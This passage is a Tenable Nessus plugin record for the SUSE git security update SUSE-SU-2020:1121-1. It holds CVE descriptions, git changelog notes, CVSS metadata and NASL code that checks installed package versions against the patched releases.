help for '/' won't be shown when there is only one hunk).\n\nSince Git 1.7.9, 'git merge' defaulted to --no-ff (i.e. even when the side branch being merged is a descendant of the current commit, create a merge commit instead of fast-forwarding) when merging a tag object.\nThis was appropriate default for integrators who pull signed tags from their downstream contributors, but caused an unnecessary merges when used by downstream contributors who habitually 'catch up' their topic branches with tagged releases from the upstream. Update 'git merge' to default to --no-ff only when merging a tag object that does *not* sit at its usual place in refs/tags/ hierarchy, and allow fast-forwarding otherwise, to mitigate the problem.\n\n'git status' can spend a lot of cycles to compute the relation between the current branch and its upstream, which can now be disabled with '--no-ahead-behind' option.\n\n'git diff' and friends learned funcname patterns for Go language source files.\n\n'git send-email' learned '--reply-to=<address>' option.\n\nFuncname pattern used for C# now recognizes 'async' keyword.\n\nIn a way similar to how 'git tag' learned to honor the pager setting only in the list mode, 'git config' learned to ignore the pager setting when it is used for setting values (i.e. when the purpose of the operation is not to 'show').\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory.
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-29T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : git (SUSE-SU-2020:1121-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-15298", "CVE-2018-11233", "CVE-2018-11235", "CVE-2018-17456", "CVE-2019-1348", "CVE-2019-1349", "CVE-2019-1350", "CVE-2019-1351", "CVE-2019-1352", "CVE-2019-1353", "CVE-2019-1354", "CVE-2019-1387", "CVE-2019-19604", "CVE-2020-11008", "CVE-2020-5260"], "modified": "2022-05-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:git", "p-cpe:/a:novell:suse_linux:git-arch", "p-cpe:/a:novell:suse_linux:git-core", "p-cpe:/a:novell:suse_linux:git-core-debuginfo", "p-cpe:/a:novell:suse_linux:git-credential-gnome-keyring", "p-cpe:/a:novell:suse_linux:git-credential-gnome-keyring-debuginfo", "p-cpe:/a:novell:suse_linux:git-credential-libsecret", "p-cpe:/a:novell:suse_linux:git-credential-libsecret-debuginfo", "p-cpe:/a:novell:suse_linux:git-cvs", "p-cpe:/a:novell:suse_linux:git-daemon", "p-cpe:/a:novell:suse_linux:git-daemon-debuginfo", "p-cpe:/a:novell:suse_linux:git-debuginfo", "p-cpe:/a:novell:suse_linux:git-debugsource", "p-cpe:/a:novell:suse_linux:git-email", "p-cpe:/a:novell:suse_linux:git-gui", "p-cpe:/a:novell:suse_linux:git-p4", "p-cpe:/a:novell:suse_linux:git-svn", "p-cpe:/a:novell:suse_linux:git-svn-debuginfo", "p-cpe:/a:novell:suse_linux:git-web", "p-cpe:/a:novell:suse_linux:gitk", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-1121-1.NASL", "href": "https://www.tenable.com/plugins/nessus/136074", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1121-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n 
script_id(136074);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/13\");\n\n script_cve_id(\n \"CVE-2017-15298\",\n \"CVE-2018-11233\",\n \"CVE-2018-11235\",\n \"CVE-2018-17456\",\n \"CVE-2019-1348\",\n \"CVE-2019-1349\",\n \"CVE-2019-1350\",\n \"CVE-2019-1351\",\n \"CVE-2019-1352\",\n \"CVE-2019-1353\",\n \"CVE-2019-1354\",\n \"CVE-2019-1387\",\n \"CVE-2019-19604\",\n \"CVE-2020-5260\",\n \"CVE-2020-11008\"\n );\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : git (SUSE-SU-2020:1121-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for git fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2020-11008: Specially crafted URLs may have tricked the\ncredentials helper to providing credential information that is not\nappropriate for the protocol in use and host being contacted\n(bsc#1169936)\n\ngit was updated to 2.26.1 (bsc#1169786, jsc#ECO-1628, bsc#1149792)\n\nFix git-daemon not starting after conversion from sysvinit to systemd\nservice (bsc#1169605).\n\nCVE-2020-5260: Specially crafted URLs with newline characters could\nhave been used to make the Git client to send credential information\nfor a wrong host to the attacker's site bsc#1168930\n\ngit 2.26.0 (bsc#1167890, jsc#SLE-11608) :\n\n'git rebase' now uses a different backend that is based on the 'merge'\nmachinery by default. 
The 'rebase.backend' configuration variable\nreverts to old behaviour when set to 'apply'\n\nImproved handling of sparse checkouts\n\nImprovements to many commands and internal features\n\ngit 2.25.2 :\n\nbug fixes to various subcommands in specific operations\n\ngit 2.25.1 :\n\n'git commit' now honors advise.statusHints\n\nvarious updates, bug fixes and documentation updates\n\ngit 2.25.0\n\nThe branch description ('git branch --edit-description') has been used\nto fill the body of the cover letters by the format-patch command;\nthis has been enhanced so that the subject can also be filled.\n\nA few commands learned to take the pathspec from the standard input or\na named file, instead of taking it as the command line arguments, with\nthe '--pathspec-from-file' option.\n\nTest updates to prepare for SHA-2 transition continues.\n\nRedo 'git name-rev' to avoid recursive calls.\n\nWhen all files from some subdirectory were renamed to the root\ndirectory, the directory rename heuristics would fail to detect that\nas a rename/merge of the subdirectory to the root directory, which has\nbeen corrected.\n\nHTTP transport had possible allocator/deallocator mismatch, which has\nbeen corrected.\n\ngit 2.24.1 :\n\nCVE-2019-1348: The --export-marks option of fast-import is exposed\nalso via the in-stream command feature export-marks=... 
and it allows\noverwriting arbitrary paths (bsc#1158785)\n\nCVE-2019-1349: on Windows, when submodules are cloned recursively,\nunder certain circumstances Git could be fooled into using the same\nGit directory twice (bsc#1158787)\n\nCVE-2019-1350: Incorrect quoting of command-line arguments allowed\nremote code execution during a recursive clone in conjunction with SSH\nURLs (bsc#1158788)\n\nCVE-2019-1351: on Windows mistakes drive letters outside of the\nUS-English alphabet as relative paths (bsc#1158789)\n\nCVE-2019-1352: on Windows was unaware of NTFS Alternate Data Streams\n(bsc#1158790)\n\nCVE-2019-1353: when run in the Windows Subsystem for Linux while\naccessing a working directory on a regular Windows drive, none of the\nNTFS protections were active (bsc#1158791)\n\nCVE-2019-1354: on Windows refuses to write tracked files with\nfilenames that contain backslashes (bsc#1158792)\n\nCVE-2019-1387: Recursive clones vulnerability that is caused by\ntoo-lax validation of submodule names, allowing very targeted attacks\nvia remote code execution in recursive clones (bsc#1158793)\n\nCVE-2019-19604: a recursive clone followed by a submodule update could\nexecute code contained within the repository without the user\nexplicitly having asked for that (bsc#1158795)\n\ngit 2.24.0\n\nThe command line parser learned '--end-of-options' notation.\n\nA mechanism to affect the default setting for a (related) group of\nconfiguration variables is introduced.\n\n'git fetch' learned '--set-upstream' option to help those who first\nclone from their private fork they intend to push to, add the true\nupstream via 'git remote add' and then 'git fetch' from it.\n\nfixes and improvements to UI, workflow and features, bash completion\nfixes\n\ngit 2.23.0 :\n\nThe '--base' option of 'format-patch' computed the patch-ids for\nprerequisite patches in an unstable way, which has been updated to\ncompute in a way that is compatible with 'git patch-id\n\n--stable'.\n\nThe 'git log' command by 
default behaves as if the --mailmap option\nwas given.\n\nfixes and improvements to UI, workflow and features\n\ngit 2.22.1\n\nA relative pathname given to 'git init --template=<path> <repo>' ought\nto be relative to the directory 'git init' gets invoked in, but it\ninstead was made relative to the repository, which has been corrected.\n\n'git worktree add' used to fail when another worktree connected to the\nsame repository was corrupt, which has been corrected.\n\n'git am -i --resolved' segfaulted after trying to see a commit as if\nit were a tree, which has been corrected.\n\n'git merge --squash' is designed to update the working tree and the\nindex without creating the commit, and this cannot be countermanded by\nadding the '--commit' option; the command now refuses to work when\nboth options are given.\n\nUpdate to Unicode 12.1 width table.\n\n'git request-pull' learned to warn when the ref we ask them to pull\nfrom in the local repository and in the published repository are\ndifferent.\n\n'git fetch' into a lazy clone forgot to fetch base objects that are\nnecessary to complete delta in a thin packfile, which has been\ncorrected.\n\nThe URL decoding code has been updated to avoid going past the end of\nthe string while parsing %-<hex>-<hex> sequence.\n\n'git clean' silently skipped a path when it cannot lstat() it; now it\ngives a warning.\n\n'git rm' to resolve a conflicted path leaked an internal message\n'needs merge' before actually removing the path, which was confusing.\nThis has been corrected.\n\nMany more bugfixes and code cleanups.\n\nremoval of SuSEfirewall2 service, since SuSEfirewall2 has been\nreplaced by firewalld.\n\npartial fix for git instaweb giving 500 error (bsc#1112230)\n\ngit 2.22.0\n\nThe filter specification '--filter=sparse:path=<path>' used to create\na lazy/partial clone has been removed. 
Using a blob that is part of\nthe project as sparse specification is still supported with the\n'--filter=sparse:oid=<blob>' option\n\n'git checkout --no-overlay' can be used to trigger a new mode of\nchecking out paths out of the tree-ish, that allows paths that match\nthe pathspec that are in the current index and working tree and are\nnot in the tree-ish.\n\nFour new configuration variables {author,committer}.{name,email} have\nbeen introduced to override user.{name,email} in more specific cases.\n\n'git branch' learned a new subcommand '--show-current'.\n\nThe command line completion (in contrib/) has been taught to complete\nmore subcommand parameters.\n\nThe completion helper code now pays attention to repository-local\nconfiguration (when available), which allows --list-cmds to honour a\nrepository specific setting of completion.commands, for example.\n\nThe list of conflicted paths shown in the editor while concluding a\nconflicted merge was shown above the scissors line when the clean-up\nmode is set to 'scissors', even though it was commented out just like\nthe list of updated paths and other information to help the user\nexplain the merge better.\n\n'git rebase' that was reimplemented in C did not set ORIG_HEAD\ncorrectly, which has been corrected.\n\n'git worktree add' used to do a 'find an available name with stat and\nthen mkdir', which is race-prone. This has been fixed by using mkdir\nand reacting to EEXIST in a loop.\n\nMove to DocBook 5.x. Asciidoctor 2.x no longer supports the legacy\nDocBook 4.5 format.\n\nupdate git-web AppArmor profile for bash and tar usrMerge\n(bsc#1132350)\n\ngit 2.21.0\n\nHistorically, the '-m' (mainline) option can only be used for 'git\ncherry-pick' and 'git revert' when working with a merge commit. This\nversion of Git no longer warns or errors out when working with a\nsingle-parent commit, as long as the argument to the '-m' option is 1\n(i.e. 
it has only one parent, and the request is to pick or revert\nrelative to that first parent). Scripts that relied on the behaviour\nmay get broken with this change.\n\nSmall fixes and features for fast-export and fast-import.\n\nThe 'http.version' configuration variable can be used with recent\nenough versions of cURL library to force the version of HTTP used to\ntalk when fetching and pushing.\n\n'git push $there $src:$dst' rejects when $dst is not a fully qualified\nrefname and it is not clear what the end user meant.\n\nUpdate 'git multimail' from the upstream.\n\nA new date format '--date=human' that morphs its output depending on\nhow far the time is from the current time has been introduced.\n'--date=auto:human' can be used to use this new format (or any\nexisting format) when the output is going to the pager or to the\nterminal, and otherwise the default format.\n\nFix worktree creation race (bsc#1114225).\n\nadd shadow build dependency to the -daemon subpackage.\n\ngit 2.20.1 :\n\nportability fixes\n\n'git help -a' did not work well when an overly long alias was defined\n\nno longer squelched an error message when the run_command API failed\nto run a missing command\n\ngit 2.20.0\n\n'git help -a' now gives verbose output (same as 'git help -av'). Those\nwho want the old output may say 'git help --no-verbose -a'..\n\n'git send-email' learned to grab address-looking string on any trailer\nwhose name ends with '-by'.\n\n'git format-patch' learned new '--interdiff' and '--range-diff'\noptions to explain the difference between this version and the\nprevious attempt in the cover letter (or after the three-dashes as a\ncomment).\n\nDeveloper builds now use -Wunused-function compilation option.\n\nFix a bug in which the same path could be registered under multiple\nworktree entries if the path was missing (for instance, was removed\nmanually). 
Also, as a convenience, expand the number of cases in which\n\n--force is applicable.\n\nThe overly large Documentation/config.txt file have been split into\nmillion little pieces. This potentially allows each individual piece\nto be included into the manual page of the command it affects more\neasily.\n\nMalformed or crafted data in packstream can make our code attempt to\nread or write past the allocated buffer and abort, instead of\nreporting an error, which has been fixed.\n\nFix for a long-standing bug that leaves the index file corrupt when it\nshrinks during a partial commit.\n\n'git merge' and 'git pull' that merges into an unborn branch used to\ncompletely ignore '--verify-signatures', which has been corrected.\n\n...and much more features and fixes\n\ngit 2.19.2 :\n\nvarious bug fixes for multiple subcommands and operations\n\ngit 2.19.1 :\n\nCVE-2018-17456: Specially crafted .gitmodules files may have allowed\narbitrary code execution when the repository is cloned with\n\n--recurse-submodules (bsc#1110949)\n\ngit 2.19.0 :\n\n'git diff' compares the index and the working tree. For paths added\nwith intent-to-add bit, the command shows the full contents of them as\nadded, but the paths themselves were not marked as new files. They are\nnow shown as new by default.\n\n'git apply' learned the '--intent-to-add' option so that an otherwise\nworking-tree-only application of a patch will add new paths to the\nindex marked with the 'intent-to-add' bit.\n\n'git grep' learned the '--column' option that gives not just the line\nnumber but the column number of the hit.\n\nThe '-l' option in 'git branch -l' is an unfortunate short-hand for\n'--create-reflog', but many users, both old and new, somehow expect it\nto be something else, perhaps '--list'. 
This step warns when '-l' is\nused as a short-hand for '--create-reflog' and warns about the future\nrepurposing of the it when it is used.\n\nThe userdiff pattern for .php has been updated.\n\nThe content-transfer-encoding of the message 'git send-email' sends\nout by default was 8bit, which can cause trouble when there is an\noverlong line to bust RFC 5322/2822 limit. A new option 'auto' to\nautomatically switch to quoted-printable when there is such a line in\nthe payload has been introduced and is made the default.\n\n'git checkout' and 'git worktree add' learned to honor\ncheckout.defaultRemote when auto-vivifying a local branch out of a\nremote tracking branch in a repository with multiple remotes that have\ntracking branches that share the same names. (merge 8d7b558bae\nab/checkout-default-remote later to maint).\n\n'git grep' learned the '--only-matching' option.\n\n'git rebase --rebase-merges' mode now handles octopus merges as well.\n\nAdd a server-side knob to skip commits in exponential/fibbonacci\nstride in an attempt to cover wider swath of history with a smaller\nnumber of iterations, potentially accepting a larger packfile\ntransfer, instead of going back one commit a time during common\nancestor discovery during the 'git fetch' transaction. (merge\n42cc7485a2 jt/fetch-negotiator-skipping later to maint).\n\nA new configuration variable core.usereplacerefs has been added,\nprimarily to help server installations that want to ignore the replace\nmechanism altogether.\n\nTeach 'git tag -s' etc. a few configuration variables (gpg.format that\ncan be set to 'openpgp' or 'x509', and gpg.<format>.program that is\nused to specify what program to use to deal with the format) to allow\nx.509 certs with CMS via 'gpgsm' to be used instead of openpgp via\n'gnupg'. 
\n\nMany more strings are prepared for l10n.\n\n'git p4 submit' learns to ask its own pre-submit hook if it should\ncontinue with submitting.\n\nThe test performed at the receiving end of 'git push' to prevent bad\nobjects from entering repository can be customized via receive.fsck.*\nconfiguration variables; we now have gained a counterpart to do the\nsame on the 'git fetch' side, with fetch.fsck.* configuration\nvariables.\n\n'git pull --rebase=interactive' learned 'i' as a short-hand for\n'interactive'.\n\n'git instaweb' has been adjusted to run better with newer Apache on\nRedHat based distros.\n\n'git range-diff' is a reimplementation of 'git tbdiff' that lets us\ncompare individual patches in two iterations of a topic.\n\nThe sideband code learned to optionally paint selected keywords at the\nbeginning of incoming lines on the receiving end.\n\n'git branch --list' learned to take the default sort order from the\n'branch.sort' configuration variable, just like 'git tag --list' pays\nattention to 'tag.sort'.\n\n'git worktree' command learned '--quiet' option to make it less\nverbose.\n\ngit 2.18.0 :\n\nimprovements to rename detection logic\n\nWhen built with more recent cURL, GIT_SSL_VERSION can now specify\n'tlsv1.3' as its value.\n\n'git mergetools' learned talking to guiffy.\n\nvarious other workflow improvements and fixes\n\nperformance improvements and other developer visible fixes\n\ngit 2.17.1\n\nSubmodule 'names' come from the untrusted .gitmodules file, but we\nblindly append them to $GIT_DIR/modules to create our on-disk repo\npaths. This means you can do bad things by putting '../' into the\nname. 
We now enforce some rules for submodule names which will cause\nGit to ignore these malicious names (CVE-2018-11235, bsc#1095219)\n\nIt was possible to trick the code that sanity-checks paths on NTFS\ninto reading random piece of memory (CVE-2018-11233, bsc#1095218)\n\nSupport on the server side to reject pushes to repositories that\nattempt to create such problematic .gitmodules file etc. as tracked\ncontents, to help hosting sites protect their customers by preventing\nmalicious contents from spreading.\n\ngit 2.17.0 :\n\n'diff' family of commands learned '--find-object=<object-id>' option\nto limit the findings to changes that involve the named object.\n\n'git format-patch' learned to give 72-cols to diffstat, which is\nconsistent with other line length limits the subcommand uses for its\noutput meant for e-mails.\n\nThe log from 'git daemon' can be redirected with a new option; one\nrelevant use case is to send the log to standard error (instead of\nsyslog) when running it from inetd.\n\n'git rebase' learned to take '--allow-empty-message' option.\n\n'git am' has learned the '--quit' option, in addition to the existing\n'--abort' option; having the pair mirrors a few other commands like\n'rebase' and 'cherry-pick'.\n\n'git worktree add' learned to run the post-checkout hook, just like\n'git clone' runs it upon the initial checkout.\n\n'git tag' learned an explicit '--edit' option that allows the message\ngiven via '-m' and '-F' to be further edited.\n\n'git fetch --prune-tags' may be used as a handy short-hand for getting\nrid of stale tags that are locally held.\n\nThe new '--show-current-patch' option gives an end-user facing way to\nget the diff being applied when 'git rebase' (and 'git am') stops with\na conflict.\n\n'git add -p' used to offer '/' (look for a matching hunk) as a choice,\neven there was only one hunk, which has been corrected. Also the\nsingle-key help is now given only for keys that are enabled (e.g. 
help\nfor '/' won't be shown when there is only one hunk).\n\nSince Git 1.7.9, 'git merge' defaulted to --no-ff (i.e. even when the\nside branch being merged is a descendant of the current commit, create\na merge commit instead of fast-forwarding) when merging a tag object.\nThis was appropriate default for integrators who pull signed tags from\ntheir downstream contributors, but caused an unnecessary merges when\nused by downstream contributors who habitually 'catch up' their topic\nbranches with tagged releases from the upstream. Update 'git merge' to\ndefault to --no-ff only when merging a tag object that does *not* sit\nat its usual place in refs/tags/ hierarchy, and allow fast-forwarding\notherwise, to mitigate the problem.\n\n'git status' can spend a lot of cycles to compute the relation between\nthe current branch and its upstream, which can now be disabled with\n'--no-ahead-behind' option.\n\n'git diff' and friends learned funcname patterns for Go language\nsource files.\n\n'git send-email' learned '--reply-to=<address>' option.\n\nFuncname pattern used for C# now recognizes 'async' keyword.\n\nIn a way similar to how 'git tag' learned to honor the pager setting\nonly in the list mode, 'git config' learned to ignore the pager\nsetting when it is used for setting values (i.e. when the purpose of\nthe operation is not to 'show').\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063412\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095218\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095219\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1110949\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1112230\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1114225\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1132350\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1149792\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1156651\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1158785\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1158787\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1158788\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1158789\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1158790\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1158791\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1158792\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1158793\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1158795\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1167890\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1168930\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1169605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1169786\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1169936\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-15298/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-11233/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-11235/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-17456/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-1348/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-1349/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-1350/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-1351/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-1352/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-1353/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-1354/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-1387/\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://www.suse.com/security/cve/CVE-2019-19604/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11008/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-5260/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201121-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?47879213\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15-SP1 :\n\nzypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-SP1-2020-1121=1\n\nSUSE Linux Enterprise Module for Development Tools 15-SP1 :\n\nzypper in -t patch\nSUSE-SLE-Module-Development-Tools-15-SP1-2020-1121=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP1-2020-1121=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19604\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-1353\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2017/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-credential-gnome-keyring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-credential-gnome-keyring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-credential-libsecret\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-credential-libsecret-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-daemon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:git-svn-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! 
preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-arch-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-core-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-core-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-credential-gnome-keyring-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-credential-gnome-keyring-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-credential-libsecret-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-credential-libsecret-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-cvs-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-daemon-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-daemon-debuginfo-2.26.1-3.25.2\")) 